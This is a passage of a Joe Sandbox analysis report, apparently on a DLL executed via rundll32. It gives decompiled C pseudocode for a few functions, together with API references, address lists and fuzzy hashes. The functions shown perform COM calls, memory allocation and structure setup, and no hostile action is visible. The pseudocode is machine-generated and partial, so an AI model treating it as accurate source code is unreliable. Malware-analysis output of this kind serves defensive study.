                                                                        0x1002c4c1
                                                                        0x1002c4c3
                                                                        0x1002c4c3
                                                                        0x1002c4c6
                                                                        0x1002c4cc
                                                                        0x1002c4ce
                                                                        0x1002c4ce
                                                                        0x1002c4d1
                                                                        0x1002c4d7
                                                                        0x1002c4dc
                                                                        0x1002c4e0

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Empty$Window
                                                                        • String ID: @
                                                                        • API String ID: 444217639-2766056989
                                                                        • Opcode ID: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
                                                                        • Instruction ID: 58262607db454327f65a07b4950f04bdf16dc99993eabd06514925c449a16dc0
                                                                        • Opcode Fuzzy Hash: 0f88fdd43cf5bce15e433ab0bc4ef339b59204e985663dc88836f237ddcb939b
                                                                        • Instruction Fuzzy Hash: 11C13972D00209DFCB05CFA8D994EAEB7F5FF48350F518569E815AB251DB34AE05CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 80%
                                                                        			E1000E14F(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                        				intOrPtr _t130;
                                                                        				intOrPtr* _t133;
                                                                        				intOrPtr* _t140;
                                                                        				intOrPtr* _t143;
                                                                        				intOrPtr _t144;
                                                                        				signed int _t146;
                                                                        				intOrPtr* _t147;
                                                                        				void* _t149;
                                                                        				intOrPtr* _t153;
                                                                        				signed int _t158;
                                                                        				intOrPtr _t159;
                                                                        				intOrPtr* _t161;
                                                                        				intOrPtr* _t163;
                                                                        				intOrPtr* _t165;
                                                                        				intOrPtr* _t166;
                                                                        				intOrPtr _t169;
                                                                        				intOrPtr* _t170;
                                                                        				intOrPtr* _t172;
                                                                        				intOrPtr _t174;
                                                                        				signed int _t178;
                                                                        				signed int _t180;
                                                                        				signed int _t186;
                                                                        				signed int _t188;
                                                                        				intOrPtr* _t190;
                                                                        				intOrPtr* _t192;
                                                                        				intOrPtr _t196;
                                                                        				intOrPtr _t198;
                                                                        				intOrPtr* _t199;
                                                                        				void* _t200;
                                                                        				intOrPtr _t213;
                                                                        				intOrPtr* _t215;
                                                                        				intOrPtr* _t261;
                                                                        				void* _t263;
                                                                        
                                                                        				E10011BF0(0x1003af36, _t263);
                                                                        				_t130 =  *0x1004c470; // 0x1bfbe703
                                                                        				_t261 = __ecx;
                                                                        				 *((intOrPtr*)(_t263 - 0x10)) = _t130;
                                                                        				 *((intOrPtr*)(_t263 - 0x88)) =  *((intOrPtr*)(__ecx + 0x14));
                                                                        				 *((intOrPtr*)(_t263 - 0x80)) =  *((intOrPtr*)(__ecx + 0x10));
                                                                        				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
                                                                        					_t133 =  *((intOrPtr*)(__ecx + 8));
                                                                        					if(_t133 != 0) {
                                                                        						_push(_t263 - 0x7c);
                                                                        						_push(_t263 - 0x78);
                                                                        						_push(0x10043008);
                                                                        						_push(_t133);
                                                                        						if( *((intOrPtr*)( *_t133 + 0xc))() >= 0) {
                                                                        							E1000B1A4(_t263 - 0x70, 0x10043744);
                                                                        							 *(_t263 - 0x50) =  *(_t263 - 0x50) | 0xffffffff;
                                                                        							 *((intOrPtr*)(_t263 - 0x58)) = 0;
                                                                        							 *((intOrPtr*)(_t263 - 0x54)) = 0;
                                                                        							 *((intOrPtr*)(_t263 - 0x4c)) = 0x18;
                                                                        							 *((intOrPtr*)(_t263 - 0x48)) = 0;
                                                                        							 *((intOrPtr*)(_t263 - 0x44)) = 0x1fb;
                                                                        							E1000B1A4(_t263 - 0x40, 0x1004372c);
                                                                        							_t140 =  *((intOrPtr*)(_t263 - 0x78));
                                                                        							 *(_t263 - 0x20) =  *(_t263 - 0x20) | 0xffffffff;
                                                                        							 *((intOrPtr*)(_t263 - 0x28)) = 0x1c;
                                                                        							 *((intOrPtr*)(_t263 - 0x24)) = 0;
                                                                        							 *((intOrPtr*)(_t263 - 0x1c)) = 0x20;
                                                                        							 *((intOrPtr*)(_t263 - 0x18)) = 0;
                                                                        							 *((intOrPtr*)(_t263 - 0x14)) = 0x1e;
                                                                        							_t196 =  *((intOrPtr*)( *_t140 + 0x10))(_t140, 2, _t263 - 0x70, 0x28, 0);
                                                                        							if(_t196 >= 0) {
                                                                        								 *(_t263 - 0xa0) =  *(_t263 - 0x7c);
                                                                        								_t143 =  *((intOrPtr*)(_t263 - 0x78));
                                                                        								 *((intOrPtr*)(_t263 - 0x9c)) = 1;
                                                                        								 *(_t263 - 0x98) = 0;
                                                                        								 *((intOrPtr*)(_t263 - 0x94)) = 0;
                                                                        								 *((intOrPtr*)(_t263 - 0x90)) = 0;
                                                                        								_t144 =  *((intOrPtr*)( *_t143 + 0x18))(_t143, 0, 0, _t263 - 0xa0);
                                                                        								 *((intOrPtr*)(_t263 - 0x84)) = _t144;
                                                                        								if(_t144 >= 0) {
                                                                        									 *(_t261 + 0x14) =  *(_t263 - 0x98);
                                                                        									_t146 =  *(_t263 - 0x8c);
                                                                        									 *(_t263 - 0x7c) = _t146;
                                                                        									 *(_t261 + 0x10) = _t146;
                                                                        									_t147 =  *((intOrPtr*)(_t263 - 0x78));
                                                                        									 *((intOrPtr*)(_t261 + 0x34)) =  *((intOrPtr*)(_t263 - 0x94));
                                                                        									 *((intOrPtr*)( *_t147 + 8))(_t147);
                                                                        									goto L23;
                                                                        								} else {
                                                                        									_t161 =  *((intOrPtr*)(_t263 - 0x78));
                                                                        									 *((intOrPtr*)( *_t161 + 8))(_t161);
                                                                        								}
                                                                        								goto L41;
                                                                        							} else {
                                                                        								_t163 =  *((intOrPtr*)(_t263 - 0x78));
                                                                        								 *((intOrPtr*)( *_t163 + 8))(_t163);
                                                                        								_t134 = _t196;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_t134 = 0;
                                                                        					}
                                                                        				} else {
                                                                        					_t165 =  *((intOrPtr*)(__ecx + 0x4c));
                                                                        					_t134 =  *((intOrPtr*)( *_t165 + 0x14))(_t165, 0x10043228, _t263 - 0x74);
                                                                        					 *((intOrPtr*)(_t263 - 0x84)) = _t134;
                                                                        					if(_t134 >= 0) {
                                                                        						_t166 =  *((intOrPtr*)(_t263 - 0x74));
                                                                        						_push(_t263 - 0x7c);
                                                                        						_push(0x10043208);
                                                                        						_push(_t166);
                                                                        						if( *((intOrPtr*)( *_t166))() >= 0) {
                                                                        							_t186 =  *(_t263 - 0x7c);
                                                                        							_push(_t263 - 0x78);
                                                                        							_push(0x10043348);
                                                                        							 *((intOrPtr*)(_t263 - 0x78)) = 0;
                                                                        							_push(_t186);
                                                                        							if( *((intOrPtr*)( *_t186 + 0x10))() >= 0) {
                                                                        								_t190 =  *((intOrPtr*)(_t263 - 0x78));
                                                                        								 *((intOrPtr*)( *_t190 + 0x14))(_t190,  *((intOrPtr*)(__ecx + 4)) + 0xe4, __ecx + 0x58);
                                                                        								_t192 =  *((intOrPtr*)(_t263 - 0x78));
                                                                        								 *((intOrPtr*)( *_t192 + 8))(_t192);
                                                                        							}
                                                                        							_t188 =  *(_t263 - 0x7c);
                                                                        							 *((intOrPtr*)( *_t188 + 8))(_t188);
                                                                        						}
                                                                        						if(E1001F77E(0x14) == 0) {
                                                                        							_t169 = 0;
                                                                        						} else {
                                                                        							_t169 = E1000D069(_t168,  *((intOrPtr*)(_t263 - 0x74)));
                                                                        						}
                                                                        						 *((intOrPtr*)(_t261 + 0x50)) = _t169;
                                                                        						_t170 =  *((intOrPtr*)(_t263 - 0x74));
                                                                        						 *((intOrPtr*)( *_t170 + 8))(_t170);
                                                                        						_t172 =  *((intOrPtr*)(_t261 + 0x50));
                                                                        						_t229 =  *_t172;
                                                                        						if( *_t172 != 0) {
                                                                        							E1000B427(_t229, _t172 + 4);
                                                                        						}
                                                                        						if(E1001F77E(0x28) == 0) {
                                                                        							_t174 = 0;
                                                                        						} else {
                                                                        							_t174 = E10009E9C(_t173, 0, 0x1f40);
                                                                        						}
                                                                        						 *((intOrPtr*)(_t261 + 0x54)) = _t174;
                                                                        						E1000DB7F(_t174);
                                                                        						 *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)) + 8)) =  *((intOrPtr*)(_t261 + 0x54));
                                                                        						_t178 =  *( *((intOrPtr*)(_t261 + 0x54)) + 0xc);
                                                                        						 *(_t261 + 0x10) = _t178;
                                                                        						_t180 = _t178 + _t178 * 4 << 3;
                                                                        						__imp__CoTaskMemAlloc(_t180,  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0x50)))));
                                                                        						 *(_t261 + 0x14) = _t180;
                                                                        						E10011C50(_t180, 0,  *(_t261 + 0x10) +  *(_t261 + 0x10) * 4 << 3);
                                                                        						E1000DA69( *((intOrPtr*)(_t261 + 0x50)));
                                                                        						E1000B3E4( *((intOrPtr*)(_t261 + 0x50)));
                                                                        						L23:
                                                                        						 *((intOrPtr*)(_t263 - 0x74)) = 0;
                                                                        						if( *(_t261 + 0x10) > 0) {
                                                                        							_t200 = 0;
                                                                        							do {
                                                                        								_t158 = E1001F77E(0x1c);
                                                                        								 *(_t263 - 0x7c) = _t158;
                                                                        								 *(_t263 - 4) = 0;
                                                                        								if(_t158 == 0) {
                                                                        									_t159 = 0;
                                                                        								} else {
                                                                        									_t159 = E1001E0EA(_t158, 0xa);
                                                                        								}
                                                                        								 *(_t263 - 4) =  *(_t263 - 4) | 0xffffffff;
                                                                        								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x74)) + 1;
                                                                        								 *((intOrPtr*)(_t200 +  *(_t261 + 0x14) + 0x24)) = _t159;
                                                                        								_t200 = _t200 + 0x28;
                                                                        							} while ( *((intOrPtr*)(_t263 - 0x74)) <  *(_t261 + 0x10));
                                                                        						}
                                                                        						_t198 =  *((intOrPtr*)(_t263 - 0x88));
                                                                        						if(_t198 != 0) {
                                                                        							if( *((intOrPtr*)(_t263 - 0x80)) > 0) {
                                                                        								_t149 = 0xffffffdc;
                                                                        								_t199 = _t198 + 0x24;
                                                                        								 *((intOrPtr*)(_t263 - 0x74)) =  *((intOrPtr*)(_t263 - 0x80));
                                                                        								 *(_t263 - 0x7c) = _t149 -  *((intOrPtr*)(_t263 - 0x88));
                                                                        								while(1) {
                                                                        									_t213 =  *((intOrPtr*)( *_t199 + 4));
                                                                        									 *((intOrPtr*)(_t263 - 0x80)) = _t213;
                                                                        									if(_t213 == 0) {
                                                                        										goto L37;
                                                                        									}
                                                                        									while(1) {
                                                                        										_t153 = E10006D96(_t263 - 0x80);
                                                                        										 *((intOrPtr*)( *_t261 + 8))( *_t153, 1);
                                                                        										if( *((intOrPtr*)(_t263 - 0x80)) == 0) {
                                                                        											goto L37;
                                                                        										}
                                                                        									}
                                                                        									L37:
                                                                        									E1001E047( *_t199);
                                                                        									_t215 =  *_t199;
                                                                        									if(_t215 != 0) {
                                                                        										 *((intOrPtr*)( *_t215 + 4))(1);
                                                                        									}
                                                                        									_t199 = _t199 + 0x28;
                                                                        									_t122 = _t263 - 0x74;
                                                                        									 *_t122 =  *((intOrPtr*)(_t263 - 0x74)) - 1;
                                                                        									if( *_t122 != 0) {
                                                                        										continue;
                                                                        									}
                                                                        									goto L40;
                                                                        								}
                                                                        							}
                                                                        							L40:
                                                                        							__imp__CoTaskMemFree( *((intOrPtr*)(_t263 - 0x88)));
                                                                        						}
                                                                        						L41:
                                                                        						_t134 =  *((intOrPtr*)(_t263 - 0x84));
                                                                        					}
                                                                        				}
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t263 - 0xc));
                                                                        				return E100117AE(_t134,  *((intOrPtr*)(_t263 - 0x10)));
                                                                        			}

                                                                        0x1000e19a
                                                                        0x1000e1a0
                                                                        0x1000e1a6
                                                                        0x1000e1ae
                                                                        0x1000e1af
                                                                        0x1000e1b4
                                                                        0x1000e1b9
                                                                        0x1000e1bb
                                                                        0x1000e1c1
                                                                        0x1000e1c2
                                                                        0x1000e1c7
                                                                        0x1000e1cc
                                                                        0x1000e1d2
                                                                        0x1000e1d4
                                                                        0x1000e1e8
                                                                        0x1000e1eb
                                                                        0x1000e1f1
                                                                        0x1000e1f1
                                                                        0x1000e1f4
                                                                        0x1000e1fa
                                                                        0x1000e1fa
                                                                        0x1000e207
                                                                        0x1000e215
                                                                        0x1000e209
                                                                        0x1000e20e
                                                                        0x1000e20e
                                                                        0x1000e217
                                                                        0x1000e21a
                                                                        0x1000e220
                                                                        0x1000e223
                                                                        0x1000e226
                                                                        0x1000e22a
                                                                        0x1000e231
                                                                        0x1000e231
                                                                        0x1000e240
                                                                        0x1000e251
                                                                        0x1000e242
                                                                        0x1000e24a
                                                                        0x1000e24a
                                                                        0x1000e256
                                                                        0x1000e25d
                                                                        0x1000e268
                                                                        0x1000e26e
                                                                        0x1000e271
                                                                        0x1000e277
                                                                        0x1000e27b
                                                                        0x1000e28d
                                                                        0x1000e290
                                                                        0x1000e29b
                                                                        0x1000e2a3
                                                                        0x1000e3d2
                                                                        0x1000e3d5
                                                                        0x1000e3d8
                                                                        0x1000e3da
                                                                        0x1000e3dc
                                                                        0x1000e3de
                                                                        0x1000e3e4
                                                                        0x1000e3e9
                                                                        0x1000e3ec
                                                                        0x1000e3f9
                                                                        0x1000e3ee
                                                                        0x1000e3f2
                                                                        0x1000e3f2
                                                                        0x1000e3fb
                                                                        0x1000e402
                                                                        0x1000e405
                                                                        0x1000e40c
                                                                        0x1000e40f
                                                                        0x1000e3dc
                                                                        0x1000e414
                                                                        0x1000e41c
                                                                        0x1000e421
                                                                        0x1000e428
                                                                        0x1000e429
                                                                        0x1000e432
                                                                        0x1000e435
                                                                        0x1000e43d
                                                                        0x1000e43f
                                                                        0x1000e444
                                                                        0x1000e447
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000e44e
                                                                        0x1000e45b
                                                                        0x1000e469
                                                                        0x1000e46f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x1000e44b
                                                                        0x1000e471
                                                                        0x1000e473
                                                                        0x1000e478
                                                                        0x1000e47c
                                                                        0x1000e482
                                                                        0x1000e482
                                                                        0x1000e485
                                                                        0x1000e488
                                                                        0x1000e488
                                                                        0x1000e48b
                                                                        0x00000000
                                                                        0x1000e43a
                                                                        0x00000000
                                                                        0x1000e48b
                                                                        0x1000e43d
                                                                        0x1000e48d
                                                                        0x1000e493
                                                                        0x1000e493
                                                                        0x1000e499
                                                                        0x1000e499
                                                                        0x1000e499
                                                                        0x1000e1a0
                                                                        0x1000e4a4
                                                                        0x1000e4b5

                                                                        APIs
                                                                        • __EH_prolog.LIBCMT ref: 1000E154
                                                                        • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 1000E27B
                                                                        • CoTaskMemFree.OLE32(?,?,00000000), ref: 1000E493
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Task$AllocFreeH_prolog
                                                                        • String ID:
                                                                        • API String ID: 1522537378-3916222277
                                                                        • Opcode ID: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
                                                                        • Instruction ID: e4bcf968e0ea1d6695bf60cb4aa7b1ca6ea302c548195cc232f4004078e55fdd
                                                                        • Opcode Fuzzy Hash: 55d795966de13a0ea59a72e0495c25d6dadcc295acfdf2e5faf40e97609b2b6a
                                                                        • Instruction Fuzzy Hash: AAC11874A006489FDB24CFA8C884AAEBBF5FF88344F20465DE155EB256DB71AD45CF10
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 54%
                                                                        			E1000B6F5(void* __ecx) {
                                                                        				intOrPtr* _t76;
                                                                        				intOrPtr* _t101;
                                                                        				intOrPtr* _t103;
                                                                        				intOrPtr* _t105;
                                                                        				intOrPtr* _t107;
                                                                        				intOrPtr* _t143;
                                                                        				void* _t146;
                                                                        				void* _t148;
                                                                        
                                                                        				E10011BF0(0x1003ae9f, _t148);
                                                                        				_t146 = __ecx;
                                                                        				_t76 =  *((intOrPtr*)(__ecx + 0x4c));
                                                                        				_push(_t148 - 0x14);
                                                                        				_push(0x10043128);
                                                                        				 *((intOrPtr*)(_t148 - 0x14)) = 0;
                                                                        				_push(_t76);
                                                                        				 *((intOrPtr*)(_t148 - 0x18)) = 0;
                                                                        				if( *((intOrPtr*)( *_t76))() >= 0) {
                                                                        					 *((intOrPtr*)(_t148 - 0x7c)) = __ecx + 0xc4;
                                                                        					 *((intOrPtr*)(_t148 - 0x74)) = __ecx + 0xd4;
                                                                        					 *((intOrPtr*)(_t148 - 0x70)) = __ecx + 0xd8;
                                                                        					 *((intOrPtr*)(_t148 - 0x80)) = 0x40;
                                                                        					 *((intOrPtr*)(_t148 - 0x78)) = 0;
                                                                        					 *((intOrPtr*)(_t148 - 0x5c)) = 0;
                                                                        					 *((intOrPtr*)(_t148 - 0x50)) = 0;
                                                                        					 *((intOrPtr*)(_t148 - 0x4c)) = 0;
                                                                        					E10010592(_t148 - 0x28);
                                                                        					_t143 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)) + 0x1c));
                                                                        					 *((intOrPtr*)(_t148 - 4)) = 0;
                                                                        					 *(_t148 - 0x6c) = 0;
                                                                        					 *((intOrPtr*)(_t148 - 0x10)) = 0;
                                                                        					do {
                                                                        						 *((intOrPtr*)( *_t143 + 0x104))(_t146,  *((intOrPtr*)( *((intOrPtr*)(_t148 - 0x10)) + 0x10040560)), _t148 - 0x28);
                                                                        						if( *((intOrPtr*)(_t148 - 0x20)) != 0) {
                                                                        							 *(_t148 - 0x6c) =  *(_t148 - 0x6c) |  *( *((intOrPtr*)(_t148 - 0x10)) + 0x10040564);
                                                                        						}
                                                                        						 *((intOrPtr*)(_t148 - 0x10)) =  *((intOrPtr*)(_t148 - 0x10)) + 8;
                                                                        					} while ( *((intOrPtr*)(_t148 - 0x10)) < 0x40);
                                                                        					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd40, _t148 - 0x28);
                                                                        					 *((intOrPtr*)(_t148 - 0x68)) =  *((intOrPtr*)(_t148 - 0x20));
                                                                        					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd43, _t148 - 0x28);
                                                                        					 *((intOrPtr*)(_t148 - 0x64)) =  *((intOrPtr*)(_t148 - 0x20));
                                                                        					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd34, _t148 - 0x28);
                                                                        					 *((intOrPtr*)(_t148 - 0x58)) =  *((short*)(_t148 - 0x20));
                                                                        					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd3f, _t148 - 0x28);
                                                                        					 *((intOrPtr*)(_t148 - 0x54)) =  *((intOrPtr*)(_t148 - 0x20));
                                                                        					 *((intOrPtr*)( *_t143 + 0x104))(_t146, 0xfffffd41, _t148 - 0x28);
                                                                        					_t101 =  *((intOrPtr*)(_t148 - 0x20));
                                                                        					_push(_t148 - 0x60);
                                                                        					_push(0x10043178);
                                                                        					_push(_t101);
                                                                        					if( *((intOrPtr*)( *_t101))() < 0) {
                                                                        						 *((intOrPtr*)(_t148 - 0x60)) = 0;
                                                                        					}
                                                                        					_t103 =  *((intOrPtr*)(_t148 - 0x14));
                                                                        					_push(_t148 - 0x40);
                                                                        					_push(_t148 - 0x80);
                                                                        					 *((intOrPtr*)(_t148 - 0x40)) = 0x18;
                                                                        					_push(_t103);
                                                                        					if( *((intOrPtr*)( *_t103 + 0xc))() >= 0) {
                                                                        						 *((intOrPtr*)(_t146 + 0x6c)) =  *((intOrPtr*)(_t148 - 0x3c));
                                                                        						 *((intOrPtr*)(_t146 + 0x5c)) =  *((intOrPtr*)(_t148 - 0x34));
                                                                        						 *((intOrPtr*)(_t146 + 0x60)) =  *((intOrPtr*)(_t148 - 0x30));
                                                                        						 *((intOrPtr*)(_t148 - 0x18)) = 1;
                                                                        					}
                                                                        					_t105 =  *((intOrPtr*)(_t148 - 0x14));
                                                                        					 *((intOrPtr*)( *_t105 + 8))(_t105);
                                                                        					_t107 =  *((intOrPtr*)(_t148 - 0x60));
                                                                        					if(_t107 != 0) {
                                                                        						 *((intOrPtr*)( *_t107 + 8))(_t107);
                                                                        					}
                                                                        					__imp__#9(_t148 - 0x28);
                                                                        				}
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t148 - 0xc));
                                                                        				return  *((intOrPtr*)(_t148 - 0x18));
                                                                        			}












                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: ClearH_prologVariant
                                                                        • String ID: @$@
                                                                        • API String ID: 1166855276-149943524
                                                                        • Opcode ID: e890f0e6bb8d7fafe3cff4ca8cca7ae2ad4144aa324fa51ad2fccd96fbd137c1
                                                                        • Instruction ID: d7a2f0cc547cc5a266f2ab8e80424e9948fc94c4121f0c35bce9c1610e35d146
                                                                        • Opcode Fuzzy Hash: e890f0e6bb8d7fafe3cff4ca8cca7ae2ad4144aa324fa51ad2fccd96fbd137c1
                                                                        • Instruction Fuzzy Hash: D551D4B1A002199FDB04CFA9C8889EEBBF9FF48314F14456EE506EB250E774A941CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 92%
                                                                        			E1001D0BB(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                        				intOrPtr _t64;
                                                                        				intOrPtr _t67;
                                                                        				signed int _t69;
                                                                        				void* _t85;
                                                                        				char* _t86;
                                                                        				void* _t99;
                                                                        				char* _t100;
                                                                        				signed char _t101;
                                                                        				CHAR* _t115;
                                                                        				intOrPtr _t120;
                                                                        				void* _t122;
                                                                        				void* _t124;
                                                                        				void* _t125;
                                                                        
                                                                        				E10011BF0(0x1003b2ec, _t122);
                                                                        				_t125 = _t124 - 0x9c;
                                                                        				_t64 =  *0x1004c470; // 0x1bfbe703
                                                                        				_push(__esi);
                                                                        				_push(__edi);
                                                                        				_t120 = __ecx;
                                                                        				 *((intOrPtr*)(_t122 - 0x10)) = _t64;
                                                                        				 *((intOrPtr*)(_t122 - 0xa8)) = __ecx;
                                                                        				E1001EC4F(__ecx, 0,  *((intOrPtr*)(_t122 + 0x1c)));
                                                                        				 *((intOrPtr*)(_t122 - 4)) = 0;
                                                                        				 *((intOrPtr*)(__ecx)) = 0x10040f84;
                                                                        				E100017B0(__ecx + 0x78);
                                                                        				 *((char*)(_t122 - 4)) = 1;
                                                                        				if( *((intOrPtr*)(_t122 + 0x20)) == 0) {
                                                                        					E10011C50(_t122 - 0xa4, 0, 0x94);
                                                                        					_t125 = _t125 + 0xc;
                                                                        					 *(_t122 - 0xa4) = 0x94;
                                                                        					GetVersionExA(_t122 - 0xa4);
                                                                        					if( *((intOrPtr*)(_t122 - 0x94)) != 2) {
                                                                        						L3:
                                                                        						 *((intOrPtr*)(_t122 + 0x20)) = 0x4c;
                                                                        					} else {
                                                                        						 *((intOrPtr*)(_t122 + 0x20)) = 0x58;
                                                                        						if( *((intOrPtr*)(_t122 - 0xa0)) < 5) {
                                                                        							goto L3;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t67 = E100107B6( *((intOrPtr*)(_t122 + 0x20)));
                                                                        				_pop(_t99);
                                                                        				 *((intOrPtr*)(_t120 + 0x70)) = _t67;
                                                                        				if(_t67 == 0) {
                                                                        					_t67 = E1001CE3B(_t99);
                                                                        				}
                                                                        				E10011C50(_t67, 0,  *((intOrPtr*)(_t122 + 0x20)));
                                                                        				_t69 =  *(_t122 + 8);
                                                                        				 *(_t120 + 0x74) = _t69;
                                                                        				asm("sbb eax, eax");
                                                                        				 *((intOrPtr*)(_t120 + 0x50)) =  ~_t69 + 0x7005;
                                                                        				 *((intOrPtr*)(_t120 + 0x1c0)) = 0;
                                                                        				_t100 = _t120 + 0x7c;
                                                                        				 *_t100 = 0;
                                                                        				_t115 = _t120 + 0xbc;
                                                                        				 *_t115 = 0;
                                                                        				 *((intOrPtr*)( *((intOrPtr*)(_t120 + 0x70)))) =  *((intOrPtr*)(_t122 + 0x20));
                                                                        				 *( *((intOrPtr*)(_t120 + 0x70)) + 0x1c) = _t115;
                                                                        				 *( *((intOrPtr*)(_t120 + 0x70)) + 0x20) = 0x104;
                                                                        				 *((intOrPtr*)( *((intOrPtr*)(_t120 + 0x70)) + 0x3c)) =  *((intOrPtr*)(_t122 + 0xc));
                                                                        				 *((intOrPtr*)( *((intOrPtr*)(_t120 + 0x70)) + 0x24)) = _t100;
                                                                        				_t101 = 0x40;
                                                                        				 *( *((intOrPtr*)(_t120 + 0x70)) + 0x28) = _t101;
                                                                        				 *( *((intOrPtr*)(_t120 + 0x70)) + 0x34) =  *( *((intOrPtr*)(_t120 + 0x70)) + 0x34) |  *(_t122 + 0x14) | 0x00080020;
                                                                        				if(( *(_t122 + 0x14) & _t101) != 0) {
                                                                        					 *( *((intOrPtr*)(_t120 + 0x70)) + 0x36) =  *( *((intOrPtr*)(_t120 + 0x70)) + 0x36) & 0x0000007f;
                                                                        				}
                                                                        				 *((intOrPtr*)( *((intOrPtr*)(_t120 + 0x70)) + 8)) =  *((intOrPtr*)(E100373B5() + 0xc));
                                                                        				 *((intOrPtr*)( *((intOrPtr*)(_t120 + 0x70)) + 0x44)) = E1001D28C;
                                                                        				if( *(_t122 + 0x10) != 0) {
                                                                        					lstrcpynA(_t115,  *(_t122 + 0x10), 0x104);
                                                                        				}
                                                                        				if( *((intOrPtr*)(_t122 + 0x18)) != 0) {
                                                                        					_t117 = _t120 + 0x78;
                                                                        					E10006AEC(_t120 + 0x78,  *((intOrPtr*)(_t122 + 0x18)));
                                                                        					_t85 = E100017D0(_t120 + 0x78, 0);
                                                                        					while(1) {
                                                                        						_t86 = E100122D4(_t117, _t120, _t85, 0x7c);
                                                                        						if(_t86 == 0) {
                                                                        							break;
                                                                        						}
                                                                        						 *_t86 = 0;
                                                                        						_t85 = _t86 + 1;
                                                                        					}
                                                                        					 *((intOrPtr*)( *((intOrPtr*)(_t120 + 0x70)) + 0xc)) =  *((intOrPtr*)(_t120 + 0x78));
                                                                        				}
                                                                        				 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0xc));
                                                                        				return E100117AE(_t120,  *((intOrPtr*)(_t122 - 0x10)));
                                                                        			}

















                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: H_prologVersionlstrcpyn
                                                                        • String ID: L
                                                                        • API String ID: 2508861242-2909332022
                                                                        • Opcode ID: 45fba12e316358985154b0c6b51ad8b47f09cec3adec5e1ce226de42e1b80597
                                                                        • Instruction ID: 246b81b315cba9c996970af4f41ffa1355ff2ed3fe1c007d423f7652d90d3d69
